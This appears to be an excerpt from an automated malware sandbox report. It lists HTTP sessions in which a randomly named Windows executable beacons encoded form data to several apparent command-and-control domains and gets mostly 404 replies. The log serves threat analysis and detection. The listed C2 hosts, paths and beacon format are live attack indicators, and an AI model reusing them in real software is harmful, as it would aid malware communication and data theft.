                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Data Ascii: 60q4=+VcDzAN33NkKKLroDG6K+fg7JnIk1E00S/ZsWK7vZSm1WwDh7R8AQhkJKz3rJduDNct3kTmm8PiLKGFb0gL6F+GGlUH7OPBmwKtj7xcR/VLvvEuMtYn+sjHP3pu5ZqbGGe//psRy6dN/CbdS4+aMQ3dJ6DFBhf/Q0l4NIzVWj0OIaFzGK1AbzwPORYhPFBUzdPR/O6c=


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      22 | 192.168.2.8 | 49731 | 84.32.84.32 | 80 | 1484 | C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Jan 13, 2025 15:13:31.063648939 CET | 778 | OUT | POST /hqr6/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Host: www.nosolofichas.online
                                                                      Origin: http://www.nosolofichas.online
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 225
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.nosolofichas.online/hqr6/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Data Ascii: 60q4=+VcDzAN33NkKLq7oQ36K2fg6MnIk/k0wS+lsWL//ZgC1WUHh6VoARhkJFT3uE9uYNchFkTqm8P2LKH1b0Xn5U+GAq0H1DvBmwKtj7xh+/Ujvu0eMu5nxmDHMypu5dqbCGe+SppxM6e1/CbtS4vaPa3cM0jFRhKK79lo+Ig5fjXKAfzCsQXIdwwnlRbJ5A2JbHsBPQtJ1Zl0/Qs7vfdt96wl1JFDI


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      23 | 192.168.2.8 | 49732 | 84.32.84.32 | 80 | 1484 | C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Jan 13, 2025 15:13:33.611244917 CET | 1795 | OUT | POST /hqr6/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Host: www.nosolofichas.online
                                                                      Origin: http://www.nosolofichas.online
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 1241
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.nosolofichas.online/hqr6/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Data Ascii: 60q4=+VcDzAN33NkKLq7oQ36K2fg6MnIk/k0wS+lsWL//ZgK1WhTh70oAShkJIz3vE9uZNcIOkT2c8NOLKl9bymn5d+GAyEH4OPBzwK9v7wN+/Ujvu22M6YnxpjHP3pulZqaXGdOspp856vV/B79SrNyPZXcO5DEOhKOk9l0yIhNmjXyAc1noA14Bh2vTRrNHJV9iCsluY+9SUQ0kQfu7bMg4hxdcHhmYdHhI1tJJmrt8CmMGyxTlx7dlxiN1F9r7iFMASQRSk3UKqBh3rMKb/Xu/sJbd2bUXAzd1Js+8MLmpylotdaimmCEh2iDD1GXURHLI6xTOB2ntMWBOG1fKg+HV0tCGFc9cDNBstrMYx36W04whSHqhcaCRXY2IXYvX3/d63KZHlWafcIUGleriwg3mCNlTAv5JzM/CKw0XqmPps9QXmIkAh7HqjMLaIh+b0okvgWzfsFV47TGhc9lrd0Ieime/Qe2dUfdOjyBx7k/TIfcMdxWI2tr9RZRhBOmcLuamCmXMjin2YByzckE3AFXl35RTD4+Vl3aWKVxQ5ElwZZv3Mdt1cdcVv7tIaG3Skw2aPb+/C5mWV8nFuxbMlqc/BlXA9Um/91Pg9Yneu6AyNye1BigCFLW42ewxI70zmQ7qoKekgNeCpOhQSgRm/LKEDSoOKzIMUju9xjBE/iSOCtqG8UZOZYrMlycvKG4mEd9L6WXMzkuKz+KGxRckPp65t8JWuQAtuVz/Rc5xeZ7tFqMIobJlzq9vKM4+aNSeuLssT+ASJIZG05q8ajWMhBSQq9iOCbWl0j4De8utsSWy7UQbsB+9hWhNA69DBBTD4KpNT1Lyvf0UydnrTlFsL7gH6N/P1laPjNMXRT/DnemIHuf0OXMAN5RTlySwLTlqWzqPhWVUkdsDg4yd7csKlh12OeT7GK2nR7n2LU5NZXrqnQ6vwNa3tTjw2zfZ45R6gj/9EsOKKWvmlPuU/uodvFL/1Gnz9KE9Wianz7rgtpGRMwQ2pVk [TRUNCATED]


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      24 | 192.168.2.8 | 49733 | 84.32.84.32 | 80 | 1484 | C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Jan 13, 2025 15:13:36.152900934 CET | 489 | OUT | GET /hqr6/?60q4=zX0jw1Jb7ql8GILmYUO6wMs9InQYjg93TcA9XJSzUhKPf0bKw3wcZTcOExSEJIWiFeUL4na64vamMH1j0X3tfeyls16INcIZma1Jpk987Wy75kHMsLzMhDfgt4WvdaOefQ==&XxGx=INH0eLoh HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Host: www.nosolofichas.online
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Jan 13, 2025 15:13:36.621598959 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                      Date: Mon, 13 Jan 2025 14:13:36 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 9973
                                                                      Connection: close
                                                                      Vary: Accept-Encoding
                                                                      Server: hcdn
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      x-hcdn-request-id: 818adec0e2dd2e189286aedbc2144723-bos-edge4
                                                                      Expires: Mon, 13 Jan 2025 14:13:35 GMT
                                                                      Cache-Control: no-cache
                                                                      Accept-Ranges: bytes
                                                                      Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"O


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      25 | 192.168.2.8 | 49734 | 134.122.135.48 | 80 | 1484 | C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Jan 13, 2025 15:13:42.519197941 CET | 761 | OUT | POST /jpjz/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Host: www.jrcov55qgcxp5fwa.top
                                                                      Origin: http://www.jrcov55qgcxp5fwa.top
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 205
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.jrcov55qgcxp5fwa.top/jpjz/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Data Ascii: 60q4=Muqh5VPLPtCMnivfD+Itk+9uDz4wmnluTDk23WlG/zpx7ZrmyViwzUOP1z1QMFrRwih/oVhKJoeWxNbYj4XdfSWgJbzXYj2Gjp2qiTudmGaTNfWR9gaeLuWeGzdrCZBJONbo4LAkHmXPjwLJxLSdH561vqZbUfzdtjNNvsjFkqJbwFtzOHDt/PdbB1/GwHHDYpfhqUc=
                                                                      Jan 13, 2025 15:13:43.444924116 CET | 306 | IN | HTTP/1.1 404 Not Found
                                                                      Content-Length: 146
                                                                      Content-Type: text/html
                                                                      Date: Mon, 13 Jan 2025 14:13:43 GMT
                                                                      Server: nginx
                                                                      X-Cache: BYPASS
                                                                      Connection: close
                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      26 | 192.168.2.8 | 49735 | 134.122.135.48 | 80 | 1484 | C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Jan 13, 2025 15:13:45.068336964 CET | 781 | OUT | POST /jpjz/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Host: www.jrcov55qgcxp5fwa.top
                                                                      Origin: http://www.jrcov55qgcxp5fwa.top
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 225
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.jrcov55qgcxp5fwa.top/jpjz/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Data Ascii: 60q4=Muqh5VPLPtCMmBnfBZktie9taT4wzXlqTDo23XhW/m5x68XmzQOwmUOPtj1RR1rKwikKoQZKJoKWxPzYjr/SeCWiF7zVWD2Gjp2qiT7VmGSTR+mRvSydIuWdHzdrUpBNONaL4OZ5HjTPj1nJyaSeeJ6zrqYPT/+GsU0osMj9v51HxzcZUlLr8P1wB2Xw1warCKPR0DLuDF8D7cFg5iGABm6Af/tB
                                                                      Jan 13, 2025 15:13:46.013258934 CET | 306 | IN | HTTP/1.1 404 Not Found
                                                                      Content-Length: 146
                                                                      Content-Type: text/html
                                                                      Date: Mon, 13 Jan 2025 14:13:45 GMT
                                                                      Server: nginx
                                                                      X-Cache: BYPASS
                                                                      Connection: close
                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      27 | 192.168.2.8 | 49736 | 134.122.135.48 | 80 | 1484 | C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Jan 13, 2025 15:13:47.606415987 CET | 1798 | OUT | POST /jpjz/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Host: www.jrcov55qgcxp5fwa.top
                                                                      Origin: http://www.jrcov55qgcxp5fwa.top
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 1241
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.jrcov55qgcxp5fwa.top/jpjz/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Jan 13, 2025 15:13:48.566893101 CET | 306 | IN | HTTP/1.1 404 Not Found
                                                                      Content-Length: 146
                                                                      Content-Type: text/html
                                                                      Date: Mon, 13 Jan 2025 14:13:48 GMT
                                                                      Server: nginx
                                                                      X-Cache: BYPASS
                                                                      Connection: close
                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      28 | 192.168.2.8 | 49737 | 134.122.135.48 | 80 | 1484 | C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Jan 13, 2025 15:13:50.161183119 CET | 490 | OUT | GET /jpjz/?60q4=BsCB6j6XIP/wuAb0HPY9posnISoRnnooDDFnz1MrtzBPzJTq92en/EOyrjYaLx3w2H4L+FlVDICDydTs7KXcVCqIKu7QdDn5nrP80R2HqmHJKcPW9CiGC+2tegxRRJIzTA==&XxGx=INH0eLoh HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Host: www.jrcov55qgcxp5fwa.top
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Jan 13, 2025 15:13:51.067569971 CET | 306 | IN | HTTP/1.1 404 Not Found
                                                                      Content-Length: 146
                                                                      Content-Type: text/html
                                                                      Date: Mon, 13 Jan 2025 14:13:50 GMT
                                                                      Server: nginx
                                                                      X-Cache: BYPASS
                                                                      Connection: close
                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      29 | 192.168.2.8 | 49738 | 47.83.1.90 | 80 | 1484 | C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Jan 13, 2025 15:13:56.131113052 CET | 734 | OUT | POST /ctdy/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Host: www.adadev.info
                                                                      Origin: http://www.adadev.info
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 205
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.adadev.info/ctdy/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Data Ascii: 60q4=0anqji6gQT7yL0vLzQNMtIeNy+oIKXZSmHc+IjW9LOzBQ8aLU18IHqxgQLikTlK1C21EtFqcogogQQWCGiQ7PR0S12oz60/t9J92H+eHEFh0nIEj6OLpNd/0CfH1PjC6fDAKOBZ5xMjb3tD17VWZwuq04ERUHpx+J/tSrdjGlnwMSNpNp65niPTVSGDEft0y5VkcrHc=


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      30 | 192.168.2.8 | 49739 | 47.83.1.90 | 80 | 1484 | C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Jan 13, 2025 15:13:58.674967051 CET | 754 | OUT | POST /ctdy/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Host: www.adadev.info
                                                                      Origin: http://www.adadev.info
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 225
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.adadev.info/ctdy/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Data Ascii: 60q4=0anqji6gQT7yZFfL/XZMvoeMsuoITHZemHQ+Im2TL8XBTdqLV08IEqxgYrilNVK6Cx8ntEWcogsgQRmCGTQ8OB0Q8Woxnk/t9J92H+LiEFp0m7sj6vLuOd/zSPH1YzCEfDA4OEkixOrb3sz16EWe6uq2l0QIXJQrIZBh3e7ck04VebYnzYxhhP7+SFryaapaj20s1QLgl9+63YqqDw2dU+wMrfXz
                                                                      Jan 13, 2025 15:14:00.275341988 CET | 137 | IN | HTTP/1.1 404 Not Found
                                                                      Server: nginx/1.18.0
                                                                      Date: Mon, 13 Jan 2025 14:14:00 GMT
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      31 | 192.168.2.8 | 49740 | 47.83.1.90 | 80 | 1484 | C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Jan 13, 2025 15:14:01.378740072 CET | 1771 | OUT | POST /ctdy/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Host: www.adadev.info
                                                                      Origin: http://www.adadev.info
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 1241
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.adadev.info/ctdy/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      32 | 192.168.2.8 | 49741 | 47.83.1.90 | 80 | 1484 | C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Jan 13, 2025 15:14:03.930385113 CET | 481 | OUT | GET /ctdy/?XxGx=INH0eLoh&60q4=5YPKgWGFQCLPNGrLxhxItoeNmOBaThMtkX9bUS/ECNXraKmEQnwhGYNyQa7ZIE66IC9AyTOQsA8Uagq2DQsZFRMH0zJP+kybsKdAAfaCKHAM6Zo7ldb4F8fWSMfSKwbdMw== HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Host: www.adadev.info
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Jan 13, 2025 15:14:05.589977026 CET | 139 | IN | HTTP/1.1 567 unknown
                                                                      Server: nginx/1.18.0
                                                                      Date: Mon, 13 Jan 2025 14:14:05 GMT
                                                                      Content-Length: 17
                                                                      Connection: close
                                                                      Data Raw: 52 65 71 75 65 73 74 20 74 6f 6f 20 6c 61 72 67 65
                                                                      Data Ascii: Request too large


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      33 | 192.168.2.8 | 49742 | 188.114.96.3 | 80 | 1484 | C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Jan 13, 2025 15:14:10.651235104 CET | 737 | OUT | POST /8rr3/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Host: www.cifasnc.info
                                                                      Origin: http://www.cifasnc.info
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 205
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.cifasnc.info/8rr3/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Data Ascii: 60q4=vLUBlmPRKk2byeF/qgF44voCPRcRwe2iVepdlR/ZvRtaTU48mdes5KkJJSiiYK3VpLvhBWHpeW/wfnVqA9oW+2X5J0bY4M/0VVPpoC1n64PnDW4wfMCfinc0BWoffQrilKeOb++ruvYqey7PVY1RsZdlnNyoX89GiCnQqe8W64C0LzHdyn77m1BnFb0MpJ4EfT4+ZIQ=
                                                                      Jan 13, 2025 15:14:11.180357933 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                      Date: Mon, 13 Jan 2025 14:14:11 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      x-pingback: http://cifasnc.info/xmlrpc.php
                                                                      expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                      last-modified: Mon, 13 Jan 2025 14:14:11 GMT
                                                                      cache-control: no-cache, must-revalidate, max-age=0
                                                                      pragma: no-cache
                                                                      vary: Accept-Encoding,User-Agent
                                                                      x-turbo-charged-by: LiteSpeed
                                                                      cf-cache-status: DYNAMIC
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WztCxx0eK0vg2HKYMua7f25IHQr5jEqC68WM%2FZ2tposYXB%2Bn7Hwsr2CIf5mPTla9CnT%2FI81z9vGnJgBCWfNBdgwBFpvfiAvgO9txM8KLh9TZBMutm%2B6naSZRsLuWYeiY7jrh"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 9015fdbf1e49c45c-EWR
                                                                      Content-Encoding: gzip
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1673&min_rtt=1673&rtt_var=836&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=737&delivery_rate=0&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      34 | 192.168.2.8 | 49743 | 188.114.96.3 | 80 | 1484 | C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Jan 13, 2025 15:14:13.210578918 CET | 757 | OUT | POST /8rr3/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Host: www.cifasnc.info
                                                                      Origin: http://www.cifasnc.info
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 225
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.cifasnc.info/8rr3/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Data Ascii: 60q4=vLUBlmPRKk2bgu1/oDt4+PoFAxcR7+2mVZhdlSzJsn9aT2Q8nfms6KkJCyi7Fa3SpLrDBWrpeSvwfnlqAK8X8mX/P0bWnc/0VVPpoCxN68bnAnowfpiA8Xc1GWofbQrYlKe8b8KNuroqeyrPVqNemZdj69zbT5MYoijhrew447a6OF23oFz9l1pMFYc6s+lsFwoOHfHm6TaEP1H5HnzkeOzHZ0WV
                                                                      Jan 13, 2025 15:14:13.785774946 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                      Date: Mon, 13 Jan 2025 14:14:13 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      x-pingback: http://cifasnc.info/xmlrpc.php
                                                                      expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                      last-modified: Mon, 13 Jan 2025 14:14:13 GMT
                                                                      cache-control: no-cache, must-revalidate, max-age=0
                                                                      pragma: no-cache
                                                                      vary: Accept-Encoding,User-Agent
                                                                      x-turbo-charged-by: LiteSpeed
                                                                      cf-cache-status: DYNAMIC
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FHWRhTN%2F%2BKdcKIs8bVUyZIHsBXF6lQFk5n3ppahO7ud0yFXWHYp8LTkLzNwLgbD9B0JCbTtWncBCwI0dj1laOH9sgpW8fHALVDziLWql0gvk7qBBT6huNKKd1r9%2FXW0wNyZj"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 9015fdcf4bd55e70-EWR
                                                                      Content-Encoding: gzip
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1583&min_rtt=1583&rtt_var=791&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=757&delivery_rate=0&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      35 | 192.168.2.8 | 49744 | 188.114.96.3 | 80 | 1484 | C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Jan 13, 2025 15:14:15.770267010 CET | 1774 | OUT | POST /8rr3/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Host: www.cifasnc.info
                                                                      Origin: http://www.cifasnc.info
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 1241
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.cifasnc.info/8rr3/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Jan 13, 2025 15:14:16.279290915 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                      Date: Mon, 13 Jan 2025 14:14:16 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      x-pingback: http://cifasnc.info/xmlrpc.php
                                                                      expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                      last-modified: Mon, 13 Jan 2025 14:14:16 GMT
                                                                      cache-control: no-cache, must-revalidate, max-age=0
                                                                      pragma: no-cache
                                                                      vary: Accept-Encoding,User-Agent
                                                                      x-turbo-charged-by: LiteSpeed
                                                                      cf-cache-status: DYNAMIC
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p%2BaLznEpSdqk%2F4rT0453YF2BVBhlZd%2FvKuH4kK%2FJtAvCbILR4fi70jaHf7BMt7HxjYc76wZt1ENhx2PgpeDKJvlLBV6t2egXNgAGRXqbI6ZRXPV5FRmSXVkR6WFuTxIx8uJ5"}],"group":"cf-nel","max_age":604800}
